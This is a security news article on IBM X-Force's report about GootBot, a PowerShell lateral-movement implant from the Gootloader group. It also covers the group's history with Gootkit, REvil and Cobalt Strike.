The creators of Gootloader, a malicious program commonly used to deploy ransomware and other malware threats on enterprise networks, have developed a new second-stage implant. Dubbed GootBot, the new post-exploitation tool is written in PowerShell and is pushed to other systems on compromised networks via lateral movement techniques.

“The Gootloader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 [command-and-control] such as CobaltStrike or RDP,” researchers from IBM X-Force said in a new report. “This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads.”

Initial access and post-exploitation

The Gootloader group, tracked as Hive0127 by X-Force or UNC2565 by Mandiant, has operated for many years, initially by developing and spreading a trojan program called Gootkit that was focused on stealing online banking credentials. Gootloader is the group’s first-stage component — or malware loader — that was used to deploy Gootkit on infected systems.

Like TrickBot and other banking trojan creators, the Gootkit developers joined the lucrative ransomware ecosystem several years ago and pivoted from stealing and selling online banking credentials to on-demand deployment of malicious payloads for other cybercriminals. For example, the Gootloader group had a notable partnership with the now defunct REvil ransomware gang.

As a provider of initial access services, the Gootloader component became much more important to the group’s operations than the Gootkit trojan itself so the group started deploying other second-stage implants like Cobalt Strike, a commercial penetration testing tool, that would provide it with persistent access to compromised systems and command-and-control (C2) capabilities.

First-stage malware loaders such as Gootloader are usually lightweight programs or scripts whose goal is to collect basic information about systems and download secondary payloads from hardcoded locations and deploy them. They don’t have advanced capabilities like advanced C2 mechanisms that allow back-and-forth communication with attackers and on-demand command execution.